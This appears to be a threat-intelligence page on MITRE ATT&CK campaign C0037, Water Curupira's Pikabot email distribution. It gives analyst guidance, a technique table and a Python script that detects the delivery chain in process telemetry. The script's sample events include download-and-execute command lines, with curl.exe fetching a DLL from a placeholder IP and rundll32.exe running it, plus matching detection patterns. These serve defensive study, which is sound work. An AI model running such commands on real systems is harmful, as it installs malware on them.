C0037: Water Curupira Pikabot Distribution
Pikabot was distributed in Water Curupira Pikabot Distribution throughout 2023 by an entity linked to BlackBasta ransomware deployment via email attachments. This activity followed the take-down of QakBot, with several technical overlaps and similarities with QakBot, indicating a possible connection. The identified activity led to the deployment of tools such as Cobalt Strike, while coinciding with campaigns delivering DarkGate and IcedID en route to ransomware deployment.[1]
Analyst context for executives and security teams
Water Curupira Pikabot Distribution matters because MITRE describes it as a 2023 email-attachment campaign distributing Pikabot, with follow-on deployment of tools such as Cobalt Strike and overlap with DarkGate, IcedID, QakBot-like activity, and ransomware-enabling operations. For leaders, the practical issue is not a single malware name: it is whether email, endpoint, and incident response controls can stop or rapidly contain a user-driven intrusion before it becomes broader tool deployment or ransomware preparation.
Executive priority
Prioritize this as an email-to-endpoint intrusion scenario that can test business resilience. Security leaders should ask whether phishing attachment defenses, user execution controls, Windows process monitoring, and rapid containment playbooks are evidenced and auditable. Because the ATT&CK object links the campaign to Pikabot, IcedID, DarkGate, Cobalt Strike deployment, and ransomware-adjacent activity, it is useful for validating budget and control coverage across managed detection, incident response readiness, and compliance evidence for anti-phishing, malware defense, and endpoint logging.
Technical view
ATT&CK provides no campaign-specific detection text and no campaign-level platform list, so defenders should drive validation from the relationships: spearphishing attachment, user execution via malicious file or link, JavaScript execution, Windows command shell, Rundll32 proxy execution, deobfuscation or decoding, ingress tool transfer, and collection of email addresses for targeting. The strongest technical review is an end-to-end test of whether email security, endpoint telemetry, script/process monitoring, and network egress visibility can correlate initial user interaction with suspicious child processes, payload transfer, decoding behavior, and follow-on tooling indicators. Windows-specific attention is supported by related software and techniques, but non-Windows exposure should be assessed only where local telemetry and affected platforms justify it.
Likely telemetry
- Email gateway and mailbox telemetry for attachments, links, sender metadata, and delivery disposition
- User interaction evidence such as attachment open, link click, or file execution events
- Endpoint process creation telemetry for cmd.exe, script interpreters, and rundll32.exe behavior
- Command-line arguments, parent-child process relationships, and file creation events around downloaded or decoded content
- Network proxy, DNS, firewall, and EDR network connection logs for external file transfer or command-and-control-like retrieval
Detection direction
- Validate correlation from phishing delivery to endpoint execution rather than relying only on attachment verdicts.
- Tune for suspicious rundll32.exe, Windows command shell, JavaScript/JScript, decoding, and external file retrieval patterns, while accounting for legitimate administrative and software activity.
- Confirm detections cover both malicious attachment and malicious link paths because the relationship set includes User Execution sub-techniques for both files and links.
- Review blind spots where email logs, endpoint process command lines, or network egress logs are missing or retained too briefly for incident reconstruction.
- Use the related malware families as threat-intelligence context for triage, but do not treat family-name detections as complete coverage for the campaign.
Mitigation priorities
- Strengthen email attachment and link controls, including detonation or analysis workflows where appropriate.
- Reduce user-execution risk with awareness, safe handling processes, and controls that restrict high-risk attachment types or script execution where business permits.
- Harden endpoint execution paths most relevant to the relationships, especially script interpreters, command shell usage, rundll32 abuse, and unauthorized payload execution.
- Ensure EDR and logging capture process creation, command lines, file writes, and network connections needed to investigate the full chain.
- Prepare incident response containment for suspected loader activity, including host isolation, mailbox search, credential risk review, and scoping for follow-on tooling.
Analyst notes and limits
The ATT&CK campaign description ties this activity to 2023 Pikabot distribution via email attachments and notes possible QakBot connection based on overlaps, plus coincidence with DarkGate and IcedID delivery en route to ransomware deployment. Treat those as source-supported context, not proof of current exposure or definitive attribution. The relationship set gives practical defensive anchors even though the campaign object itself does not specify platforms or tactics.
No official MITRE detection text is provided for this campaign, and campaign-level platforms and tactics are not specified. Any organization-specific risk rating requires local evidence: mail exposure, endpoint platform mix, logging depth, control configuration, and recent alert or incident history. This take does not claim active exploitation, customer exposure, or guaranteed detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.002 | User Execution: Malicious File | Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL.[1] |
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.[1] |
| Enterprise | T1204 | User Execution | Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.[1] |
| Enterprise | T1204.001 | User Execution: Malicious Link | Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.[1] |
| Enterprise | T1589.002 | Gather Victim Identity Information: Email Addresses | Water Curupira Pikabot Distribution utilizes thread spoofing of existing email threads in order to execute spear phishing operations.[1] |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.[1] |
| Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.[1] |
| Enterprise | T1218.011 | System Binary Proxy Execution: Rundll32 | Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports `Crash` or `Limit` depending on the variant.[1] |
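The technique table above, together with the "Technical view" and "Detection direction" sections, describes one delivery chain: a script host running obfuscated JavaScript, follow-on cmd.exe, curl.exe writing a payload to the temporary directory, and rundll32.exe calling the `Crash` or `Limit` export. The example below is added here to show how that correlation can be tested against endpoint process-creation telemetry; it is not code from MITRE, Trend Micro or Glexia. The event schema (`host`, `pid`, `ppid`, `image`, `cmdline`), the sample events, the hostnames and the 203.0.113.x address are all constructed for the example. It goes slightly beyond the page by also flagging a rundll32 export hit with no script-host ancestor, since the PDF-link path in the table does not start from JavaScript.

```python
"""Correlate Windows process-creation events into the Pikabot delivery chain
described by the campaign relationships: JavaScript via a script host, a
follow-on cmd.exe, curl.exe writing to the temp directory, and rundll32.exe
calling the 'Crash' or 'Limit' export. Sample events are constructed for this
example; the flat field names are an assumed schema, not a product's format."""
from collections import defaultdict
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PIKABOT_EXPORTS = {"crash", "limit"}  # named exports cited in the TrendMicro report
TEMP_PATH_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
# rundll32 <dll>,<export>: capture the DLL path and the export after the comma
RUNDLL_EXPORT_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^"\s,]+\.dll)"?,(\w+)', re.IGNORECASE)

SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    # WS01: the full chain from the technique table
    {"host": "WS01", "pid": 4011, "ppid": 3000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Invoice\Invoice.js"'},
    {"host": "WS01", "pid": 4012, "ppid": 4011, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start /b update"},
    {"host": "WS01", "pid": 4013, "ppid": 4012, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\update.dll http://203.0.113.10/update"},
    {"host": "WS01", "pid": 4014, "ppid": 4012, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\update.dll,Crash"},
    # WS02: legitimate rundll32 use from the shell; must not alert
    {"host": "WS02", "pid": 5001, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "WS02", "pid": 5002, "ppid": 5001, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    # WS03: logon script that spawns cmd.exe only; below the default threshold
    {"host": "WS03", "pid": 6001, "ppid": 900, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Scripts\logon.js"},
    {"host": "WS03", "pid": 6002, "ppid": 6001, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c net use"},
    # WS04: rundll32 with the Limit export from temp, but no script-host ancestor
    {"host": "WS04", "pid": 7001, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "WS04", "pid": 7002, "ppid": 7001, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\doc.dll,Limit"},
]


def image_name(event):
    return event["image"].rsplit("\\", 1)[-1].lower()


def stage_of(event):
    """Map one process-creation event to a chain stage, or None if it is not one."""
    name, cmd = image_name(event), event["cmdline"]
    if name in SCRIPT_HOSTS and re.search(r"\.js\b", cmd, re.IGNORECASE):
        return "js_script_host"
    if name == "cmd.exe":
        return "cmd_shell"
    if name == "curl.exe" and TEMP_PATH_RE.search(cmd):
        return "curl_to_temp"
    if name == "rundll32.exe":
        m = RUNDLL_EXPORT_RE.search(cmd)
        if m and m.group(2).lower() in PIKABOT_EXPORTS and TEMP_PATH_RE.search(m.group(1)):
            return "rundll32_pikabot_export"
    return None


def build_index(events):
    by_id = {(e["host"], e["pid"]): e for e in events}
    children = defaultdict(list)
    for e in events:
        children[(e["host"], e["ppid"])].append(e)
    return by_id, children


def subtree(root, children):
    """Root event plus all of its descendants on the same host (iterative DFS)."""
    out, stack = [], [root]
    while stack:
        e = stack.pop()
        out.append(e)
        stack.extend(children.get((e["host"], e["pid"]), []))
    return out


def find_chains(events, min_stages=3):
    """One finding per script-host root whose process tree reaches at least
    `min_stages` distinct stages; the threshold is the tuning knob that keeps
    ordinary script-plus-shell activity from alerting."""
    _, children = build_index(events)
    findings = []
    for root in events:
        if stage_of(root) != "js_script_host":
            continue
        stages = {s for s in map(stage_of, subtree(root, children)) if s}
        if len(stages) >= min_stages:
            findings.append({"host": root["host"], "root_pid": root["pid"],
                             "stages": sorted(stages),
                             "severity": "high" if len(stages) == 4 else "medium"})
    return findings


def orphan_rundll32_hits(events):
    """rundll32 calling a Pikabot export from temp with no script-host ancestor:
    still worth an alert, because the PDF-link path does not begin with JavaScript."""
    by_id, _ = build_index(events)
    hits = []
    for e in events:
        if stage_of(e) != "rundll32_pikabot_export":
            continue
        cur, has_js_ancestor = by_id.get((e["host"], e["ppid"])), False
        while cur is not None and not has_js_ancestor:
            has_js_ancestor = stage_of(cur) == "js_script_host"
            cur = by_id.get((cur["host"], cur["ppid"]))
        if not has_js_ancestor:
            hits.append((e["host"], e["pid"]))
    return hits


if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f"{f['severity'].upper()} chain on {f['host']} (root pid {f['root_pid']}): {f['stages']}")
    for host, pid in orphan_rundll32_hits(SAMPLE_EVENTS):
        print(f"MEDIUM rundll32 Pikabot export on {host} (pid {pid}) without script-host ancestor")
```

Run as-is it reports the WS01 chain as high and the WS04 rundll32 hit as medium, and stays quiet on the benign WS02 and WS03 activity; lowering `min_stages` to 2 surfaces WS03 as well, which is the trade-off the "Detection direction" list describes when it asks for tuning against legitimate administrative activity. Feeding real process-creation events in requires mapping your EDR or Sysmon fields onto the assumed schema and, ideally, joining the script-host root back to the mail-delivery and attachment-open events the "Likely telemetry" list names.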
Groups, software, and campaigns
S1145: Pikabot
Pikabot is a backdoor used for initial access and follow-on tool deployment active since early 2023. Pikabot is notable for extensive use of multiple encoding, encryption, and defense evasion mechanisms to evade defenses and avoid analysis. Pikabot has some overlaps with QakBot, but insufficient evidence exists to definitively link these two malware families. Pikabot is frequently used to deploy follow on tools such as Cobalt Strike or ransomware variants.[1][2][3]
S1111: DarkGate
DarkGate first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named "DarkGate" by its author, DarkGate is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.[1] DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.[2]
S0483: IcedID
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 6b61cb2d7ec0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] TrendMicro Pikabot 2024: Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot & Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign. Retrieved July 17, 2024. Open source URL.
[2] mitre-attack C0037. Open source URL.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.